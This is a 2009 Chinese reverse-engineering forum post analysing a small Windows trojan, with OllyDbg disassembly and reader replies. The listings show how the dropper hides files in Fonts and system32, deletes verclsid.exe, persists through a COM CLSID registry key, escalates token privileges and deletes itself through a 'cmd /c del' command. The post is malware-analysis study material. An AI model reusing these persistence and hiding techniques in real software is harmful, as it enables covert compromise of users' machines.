一个小马的分析
本帖最后由 missviola 于 2009-12-31 10:36 编辑【破文标题】一个小马的分析
【破文作者】missviola
【破解工具】PEID OD
【破解平台】Windows XP
【原版下载】在附件中
【破解声明】只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
------------------------------------------------------------------------
【破解过程】PEID查壳显示加了upx的壳,直接用upx的加壳软件直接脱掉。脱掉后检测显示为Microsoft Visual C++ 6.0
,大小为41077字节。用OD载入分析如下:
创建线程:
00401AC9|.50 push eax ; /pThreadId = 0012FF20
00401ACA|.56 push esi ; |CreationFlags => 0
00401ACB|.FF75 08 push dword ptr ; |pThreadParm
00401ACE|.68 43194000 push 00401943 ; |ThreadFunction =
CTFMON.00401943
00401AD3|.56 push esi ; |StackSize => 0
00401AD4|.56 push esi ; |pSecurity => NULL
00401AD5|.FF15 44304000 call dword ptr [<&KERNEL32.CreateThread>] ; \CreateThread
获得windows目录:
00401667/$55 push ebp
00401668|.8BEC mov ebp, esp
0040166A|.81EC 08010000 sub esp, 108
00401670|.80A5 F8FEFFFF>and byte ptr , 0
00401677|.57 push edi
00401678|.6A 41 push 41
0040167A|.33C0 xor eax, eax
0040167C|.59 pop ecx
0040167D|.8DBD F9FEFFFF lea edi, dword ptr
00401683|.F3:AB rep stos dword ptr es:
00401685|.8D85 F8FEFFFF lea eax, dword ptr
0040168B|.68 04010000 push 104 ; /BufSize = 104 (260.)
00401690|.50 push eax ; |Buffer
00401691|.FF15 B4304000 call dword ptr [<&KERNEL32.GetWindowsDirectoryA>; \GetWindowsDirectoryA
00401697|.8D85 F8FEFFFF lea eax, dword ptr
输出为%SystemRoot%\Fonts\PACNkAWTwg4Cyb3e.Ttf
0040169D|.68 D0414000 push 004041D0 ; /<%s> = "PACNkAWTwg4Cyb3e"
004016A2|.50 push eax ; |<%s>
004016A3|.68 C0414000 push 004041C0 ; |format = "%s\fOnts\%s.Ttf"
004016A8|.FF75 08 push dword ptr ; |s
004016AB|.FF15 08314000 call dword ptr [<&MSVCRT.sprintf>] ; \sprintf
打开自身文件:
00401CE9|.56 push esi ; /hTemplateFile => NULL
00401CEA|.68 80000000 push 80 ; |Attributes = NORMAL
00401CEF|.6A 03 push 3 ; |Mode = OPEN_EXISTING
00401CF1|.56 push esi ; |pSecurity => NULL
00401CF2|.6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
00401CF4|.68 00000080 push 80000000 ; |Access = GENERIC_READ
00401CF9|.FF75 08 push dword ptr ; |FileName
00401CFC|.FF15 90304000 call dword ptr [<&KERNEL32.CreateFileA>] ; \CreateFileA
读自身文件:
00401D2D|.56 push esi ; /pOverlapped
00401D2E|.FF75 0C push dword ptr ; |pBytesRead
00401D31|.FF75 08 push dword ptr ; |BytesToRead
00401D34|.57 push edi ; |Buffer
00401D35|.53 push ebx ; |hFile
00401D36|.FF15 4C304000 call dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile
创建PACNkAWTwg4Cyb3e.Ttf文件,设为隐藏属性:
00401D52|.56 push esi ; /hTemplateFile => NULL
00401D53|.68 86000000 push 86 ; |Attributes =
HIDDEN|SYSTEM|NORMAL
00401D58|.6A 04 push 4 ; |Mode = OPEN_ALWAYS
00401D5A|.56 push esi ; |pSecurity => NULL
00401D5B|.56 push esi ; |ShareMode => 0
00401D5C|.6A 02 push 2 ; |Access = 2
00401D5E|.8975 FC mov dword ptr , esi ; |
00401D61|.FF75 08 push dword ptr ; |FileName
00401D64|.FF15 90304000 call dword ptr [<&KERNEL32.CreateFileA>] ; \CreateFileA
写入文件:
00401D81|.56 push esi ; /pOverlapped
00401D82|.50 push eax ; |pBytesWritten
00401D83|.FF75 10 push dword ptr ; |nBytesToWrite
00401D86|.FF75 0C push dword ptr ; |Buffer
00401D89|.57 push edi ; |hFile
00401D8A|.FF15 94304000 call dword ptr [<&KERNEL32.WriteFile>] ; \WriteFile
输出路径为%SystemRoot%\system32\56BC86C7.dll:
004011EC/$55 push ebp
004011ED|.8BEC mov ebp, esp
004011EF|.81EC 04010000 sub esp, 104
004011F5|.80A5 FCFEFFFF>and byte ptr , 0
004011FC|.57 push edi
004011FD|.6A 40 push 40
004011FF|.33C0 xor eax, eax
00401201|.59 pop ecx
00401202|.8DBD FDFEFFFF lea edi, dword ptr
00401208|.F3:AB rep stos dword ptr es:
0040120A|.837D 18 00 cmp dword ptr , 0
0040120E|.66:AB stos word ptr es:
00401210|.AA stos byte ptr es:
00401211|.5F pop edi
00401212|.74 47 je short 0040125B
00401214|.56 push esi
00401215|.8D85 FCFEFFFF lea eax, dword ptr
0040121B|.68 04010000 push 104 ; /BufSize = 104 (260.)
00401220|.50 push eax ; |Buffer
00401221|.FF15 B4304000 call dword ptr [<&KERNEL32.GetWindowsDirectoryA>; \GetWindowsDirectoryA
00401227|.BE 38414000 mov esi, 00404138
0040122C|.8D85 FCFEFFFF lea eax, dword ptr
00401232|.56 push esi ; /src => "\"
00401233|.50 push eax ; |dest
00401234|.E8 B90C0000 call <jmp.&MSVCRT.strcat> ; \strcat
00401239|.8D85 FCFEFFFF lea eax, dword ptr
0040123F|.68 8C414000 push 0040418C ; /src = "system32"
00401244|.50 push eax ; |dest
00401245|.E8 A80C0000 call <jmp.&MSVCRT.strcat> ; \strcat
0040124A|.8D85 FCFEFFFF lea eax, dword ptr
00401250|.56 push esi ; /src
00401251|.50 push eax ; |dest
00401252|.E8 9B0C0000 call <jmp.&MSVCRT.strcat> ; \strcat
00401257|.83C4 18 add esp, 18
0040125A|.5E pop esi
0040125B|>FF75 14 push dword ptr ; /<%s>
0040125E|.8D85 FCFEFFFF lea eax, dword ptr ; |
00401264|.FF75 0C push dword ptr ; |<%s>
00401267|.50 push eax ; |<%s>
00401268|.68 84414000 push 00404184 ; |format = "%s%s.%s"
0040126D|.FF75 08 push dword ptr ; |s
00401270|.FF15 08314000 call dword ptr [<&MSVCRT.sprintf>] ; \sprintf
创建文件56BC86C7.dll,设为隐藏属性:
00401D52|.56 push esi ; /hTemplateFile => NULL
00401D53|.68 86000000 push 86 ; |Attributes =
HIDDEN|SYSTEM|NORMAL
00401D58|.6A 04 push 4 ; |Mode = OPEN_ALWAYS
00401D5A|.56 push esi ; |pSecurity => NULL
00401D5B|.56 push esi ; |ShareMode => 0
00401D5C|.6A 02 push 2 ; |Access = 2
00401D5E|.8975 FC mov dword ptr , esi ; |
00401D61|.FF75 08 push dword ptr ; |FileName
00401D64|.FF15 90304000 call dword ptr [<&KERNEL32.CreateFileA>] ; \CreateFileA
写入文件:
00401D81|.56 push esi ; /pOverlapped
00401D82|.50 push eax ; |pBytesWritten
00401D83|.FF75 10 push dword ptr ; |nBytesToWrite
00401D86|.FF75 0C push dword ptr ; |Buffer
00401D89|.57 push edi ; |hFile
00401D8A|.FF15 94304000 call dword ptr [<&KERNEL32.WriteFile>] ; \WriteFile
载入56BC86C7.DLL,获取JUFNdB4pARSJ函数地址运行:
004013CC/$FF7424 04 push dword ptr ; /FileName =
"C:\WINDOWS\system32\56BC86C7.dll"
004013D0|.FF15 A0304000 call dword ptr [<&KERNEL32.LoadLibraryA>] ; \LoadLibraryA
004013D6|.85C0 test eax, eax
004013D8|.74 12 je short 004013EC
004013DA|.68 98414000 push 00404198 ; /ProcNameOrOrdinal =
"JUFndB4pARSJ"
004013DF|.50 push eax ; |hModule
004013E0|.FF15 A4304000 call dword ptr [<&KERNEL32.GetProcAddress>] ; \GetProcAddress
004013E6|.85C0 test eax, eax
004013E8|.74 02 je short 004013EC
004013EA|.FFD0 call eax
004013EC\>C2 0400 retn 4
删除%SystemRoot%\system32\verclsid.exe:
00401173|.50 push eax ; /pFindFileData
00401174|.8D85 FCFEFFFF lea eax, dword ptr ; |
0040117A|.50 push eax ; |FileName
0040117B|.FF15 BC304000 call dword ptr [<&KERNEL32.FindFirstFileA>] ; \FindFirstFileA
00401181|.83F8 FF cmp eax, -1
00401184|.74 18 je short 0040119E
00401186|.8D85 FCFEFFFF lea eax, dword ptr
0040118C|.50 push eax ; /FileName
0040118D|.FF15 C0304000 call dword ptr [<&KERNEL32.DeleteFileA>] ; \DeleteFileA
创建注册表键HKEY_CLASSES_ROOT\CLSID\{56BC86C7-0692-4F94-A2C1-6CF1DBF8096C}\InprocServer32:
00401CA9|.50 push eax ; /pHandle
00401CAA|.FF75 0C push dword ptr ; |Subkey
00401CAD|.FF75 08 push dword ptr ; |hKey
00401CB0|.FF15 2C304000 call dword ptr [<&ADVAPI32.RegCreateKeyA>] ; \RegCreateKeyA
设置键值:
00401CC3|.50 push eax ; /BufSize
00401CC4|.FF75 14 push dword ptr ; |Buffer
00401CC7|.6A 01 push 1 ; |ValueType = REG_SZ
00401CC9|.6A 00 push 0 ; |Reserved = 0
00401CCB|.FF75 10 push dword ptr ; |ValueName
00401CCE|.FF75 0C push dword ptr ; |hKey
00401CD1|.FF15 20304000 call dword ptr [<&ADVAPI32.RegSetValueExA>] ; \RegSetValueExA
00401CC3|.50 push eax ; /BufSize
00401CC4|.FF75 14 push dword ptr ; |Buffer
00401CC7|.6A 01 push 1 ; |ValueType = REG_SZ
00401CC9|.6A 00 push 0 ; |Reserved = 0
00401CCB|.FF75 10 push dword ptr ; |ValueName
00401CCE|.FF75 0C push dword ptr ; |hKey
00401CD1|.FF15 20304000 call dword ptr [<&ADVAPI32.RegSetValueExA>] ; \RegSetValueExA
删除自身:
004016C1/$55 push ebp
004016C2|.8BEC mov ebp, esp
004016C4|.81EC 08020000 sub esp, 208
004016CA|.53 push ebx
004016CB|.57 push edi
004016CC|.BF 04010000 mov edi, 104
004016D1|.8D85 F8FDFFFF lea eax, dword ptr
004016D7|.57 push edi ; /BufSize => 104 (260.)
004016D8|.33DB xor ebx, ebx ; |
004016DA|.50 push eax ; |PathBuffer
004016DB|.53 push ebx ; |hModule => NULL
004016DC|.FF15 AC304000 call dword ptr [<&KERNEL32.GetModuleFileNameA>] ; \GetModuleFileNameA
004016E2|.85C0 test eax, eax
004016E4|.0F84 B8000000 je 004017A2
004016EA|.8D85 F8FDFFFF lea eax, dword ptr
004016F0|.57 push edi ; /MaxShortPathSize => 104 (260.)
004016F1|.50 push eax ; |ShortPath
004016F2|.8D85 F8FDFFFF lea eax, dword ptr ; |
004016F8|.50 push eax ; |LongPath
004016F9|.FF15 7C304000 call dword ptr [<&KERNEL32.GetShortPathNameA>]; \GetShortPathNameA
004016FF|.85C0 test eax, eax
00401701|.0F84 9B000000 je 004017A2
00401707|.56 push esi
00401708|.8D85 FCFEFFFF lea eax, dword ptr
0040170E|.68 FC414000 push 004041FC ; //c
00401713|.50 push eax ; |String1
00401714|.FF15 80304000 call dword ptr [<&KERNEL32.lstrcpyA>] ; \lstrcpyA
0040171A|.8B35 84304000 mov esi, dword ptr [<&KERNEL32.lstrcatA>] ;kernel32.lstrcatA
00401720|.8D85 FCFEFFFF lea eax, dword ptr
00401726|.68 F8414000 push 004041F8 ; / d
0040172B|.50 push eax ; |ConcatString
0040172C|.FFD6 call esi ; \lstrcatA
0040172E|.8D85 FCFEFFFF lea eax, dword ptr
00401734|.68 10414000 push 00404110 ; /e
00401739|.50 push eax ; |ConcatString
0040173A|.FFD6 call esi ; \lstrcatA
0040173C|.8D85 FCFEFFFF lea eax, dword ptr
00401742|.68 F4414000 push 004041F4 ; /l
00401747|.50 push eax ; |ConcatString
00401748|.FFD6 call esi ; \lstrcatA
0040174A|.8D85 F8FDFFFF lea eax, dword ptr
00401750|.50 push eax ; /StringToAdd
00401751|.8D85 FCFEFFFF lea eax, dword ptr ; |
00401757|.50 push eax ; |ConcatString
00401758|.FFD6 call esi ; \lstrcatA
0040175A|.8D85 FCFEFFFF lea eax, dword ptr
00401760|.68 EC414000 push 004041EC ; / >> nul
00401765|.50 push eax ; |ConcatString
00401766|.FFD6 call esi ; \lstrcatA
00401768|.8D85 F8FDFFFF lea eax, dword ptr
0040176E|.57 push edi ; /BufSize => 104 (260.)
0040176F|.50 push eax ; |Buffer
00401770|.68 E4414000 push 004041E4 ; |comspec
00401775|.FF15 88304000 call dword ptr [<&KERNEL32.GetEnvironmentVariab>; \GetEnvironmentVariableA
0040177B|.85C0 test eax, eax
0040177D|.5E pop esi
0040177E|.74 22 je short 004017A2
00401780|.53 push ebx ; /IsShown => 0
00401781|.8D85 FCFEFFFF lea eax, dword ptr ; |
00401787|.53 push ebx ; |DefDir => NULL
00401788|.50 push eax ; |Parameters
00401789|.8D85 F8FDFFFF lea eax, dword ptr ; |
0040178F|.50 push eax ; |FileName
00401790|.53 push ebx ; |Operation => NULL
00401791|.53 push ebx ; |hWnd => NULL
00401792|.FF15 44314000 call dword ptr [<&SHELL32.ShellExecuteA>] ; \ShellExecuteA
00401798|.83F8 20 cmp eax, 20
0040179B|.7E 05 jle short 004017A2
0040179D|.6A 01 push 1
0040179F|.58 pop eax
004017A0|.EB 02 jmp short 004017A4
004017A2|>33C0 xor eax, eax
004017A4|>5F pop edi
004017A5|.5B pop ebx
004017A6|.C9 leave
004017A7\.C3 retn
DLL分析:
提升权限:
10005A24 55 push ebp
10005A25 8BEC mov ebp, esp
10005A27 83EC 2C sub esp, 2C
10005A2A 53 push ebx
10005A2B 56 push esi
10005A2C 57 push edi
10005A2D 6A 10 push 10
10005A2F 5F pop edi
10005A30 8D45 08 lea eax, dword ptr
10005A33 50 push eax
10005A34 6A 28 push 28
10005A36 FF75 08 push dword ptr
10005A39 897D FC mov dword ptr , edi
10005A3C FF15 2C700010 call dword ptr ; ADVAPI32.OpenProcessToken
10005A42 85C0 test eax, eax
10005A44 74 78 je short 10005ABE
10005A46 8D45 F4 lea eax, dword ptr
10005A49 33F6 xor esi, esi
10005A4B 50 push eax
10005A4C FF75 0C push dword ptr
10005A4F 56 push esi
10005A50 FF15 28700010 call dword ptr ; ADVAPI32.LookupPrivilegeValueA
10005A56 85C0 test eax, eax
10005A58 74 64 je short 10005ABE
10005A5A 8B45 F4 mov eax, dword ptr
10005A5D 6A 01 push 1
10005A5F 8945 D8 mov dword ptr , eax
10005A62 8B45 F8 mov eax, dword ptr
10005A65 8945 DC mov dword ptr , eax
10005A68 5B pop ebx
10005A69 8D45 FC lea eax, dword ptr
10005A6C 8975 E0 mov dword ptr , esi
10005A6F 50 push eax
10005A70 8D45 E4 lea eax, dword ptr
10005A73 50 push eax
10005A74 8D45 D4 lea eax, dword ptr
10005A77 57 push edi
10005A78 50 push eax
10005A79 56 push esi
10005A7A 8B35 24700010 mov esi, dword ptr ; ADVAPI32.AdjustTokenPrivileges
10005A80 FF75 08 push dword ptr
10005A83 895D D4 mov dword ptr , ebx
10005A86 FFD6 call esi
10005A88 8B3D 9C700010 mov edi, dword ptr ; ntdll.RtlGetLastWin32Error
10005A8E FFD7 call edi
10005A90 85C0 test eax, eax
10005A92 75 2A jnz short 10005ABE
10005A94 8B45 F4 mov eax, dword ptr
10005A97 834D F0 02 or dword ptr , 2
10005A9B 8945 E8 mov dword ptr , eax
10005A9E 8B45 F8 mov eax, dword ptr
10005AA1 8945 EC mov dword ptr , eax
10005AA4 33C0 xor eax, eax
10005AA6 50 push eax
10005AA7 50 push eax
10005AA8 FF75 FC push dword ptr
10005AAB 8D4D E4 lea ecx, dword ptr
10005AAE 895D E4 mov dword ptr , ebx
10005AB1 51 push ecx
10005AB2 50 push eax
10005AB3 FF75 08 push dword ptr
10005AB6 FFD6 call esi
10005AB8 FFD7 call edi
10005ABA 85C0 test eax, eax
10005ABC 74 04 je short 10005AC2
10005ABE 33C0 xor eax, eax
10005AC0 EB 0B jmp short 10005ACD
10005AC2 FF75 08 push dword ptr
10005AC5 FF15 C0700010 call dword ptr ; kernel32.CloseHandle
10005ACB 8BC3 mov eax, ebx
10005ACD 5F pop edi
10005ACE 5E pop esi
10005ACF 5B pop ebx
10005AD0 C9 leave
10005AD1 C3 retn
创建两个线程:
100057CB 56 push esi
100057CC 8BF1 mov esi, ecx
100057CE 33C0 xor eax, eax
100057D0 3946 04 cmp dword ptr , eax
100057D3 75 1E jnz short 100057F3
100057D5 57 push edi
100057D6 8D7E 08 lea edi, dword ptr
100057D9 57 push edi
100057DA 50 push eax
100057DB FF7424 18 push dword ptr
100057DF FF7424 18 push dword ptr
100057E3 50 push eax
100057E4 50 push eax
100057E5 FF15 E0700010 call dword ptr ; kernel32.CreateThread
100057EB 8946 04 mov dword ptr , eax
100057EE 8B07 mov eax, dword ptr
100057F0 5F pop edi
100057F1 EB 02 jmp short 100057F5
100057F3 33C0 xor eax, eax
100057F5 5E pop esi
100057F6 C2 0800 retn 8
100057CB 56 push esi
100057CC 8BF1 mov esi, ecx
100057CE 33C0 xor eax, eax
100057D0 3946 04 cmp dword ptr , eax
100057D3 75 1E jnz short 100057F3
100057D5 57 push edi
100057D6 8D7E 08 lea edi, dword ptr
100057D9 57 push edi
100057DA 50 push eax
100057DB FF7424 18 push dword ptr
100057DF FF7424 18 push dword ptr
100057E3 50 push eax
100057E4 50 push eax
100057E5 FF15 E0700010 call dword ptr ; kernel32.CreateThread
100057EB 8946 04 mov dword ptr , eax
100057EE 8B07 mov eax, dword ptr
100057F0 5F pop edi
100057F1 EB 02 jmp short 100057F5
100057F3 33C0 xor eax, eax
100057F5 5E pop esi
100057F6 C2 0800 retn 8
------------------------------------------------------------------------
【破解总结】最后总结下该小马的行为:
1.释放两个文件:PACNkAWTwg4Cyb3e.Ttf和56BC86C7.dll到系统根目录。
2.删除system32目录下的verclsid.exe。
3.写入注册表:
内容如图所示:
4.删除自身。
------------------------------------------------------------------------
【版权声明】本文原创于52pojie技术论坛, 转载请注明作者并保持文章的完整, 谢谢!
脱壳后的样本:
学习 分析很透彻啊 (*^__^*) 嘻嘻 分析的不错哦~ 继续把56BC86C7.dll分析了吧. 恩,分析的不错,呵呵!
同意把DLL 也分析了吧! (*^__^*) 嘻嘻 分析的不错哦~ 嗯 学习了谢谢分享 分析的很到位啊。学习中 分析的很到位啊 DLL那线程就是关键了,再跟踪分析一下吧,就差不多了。
页:
[1]
2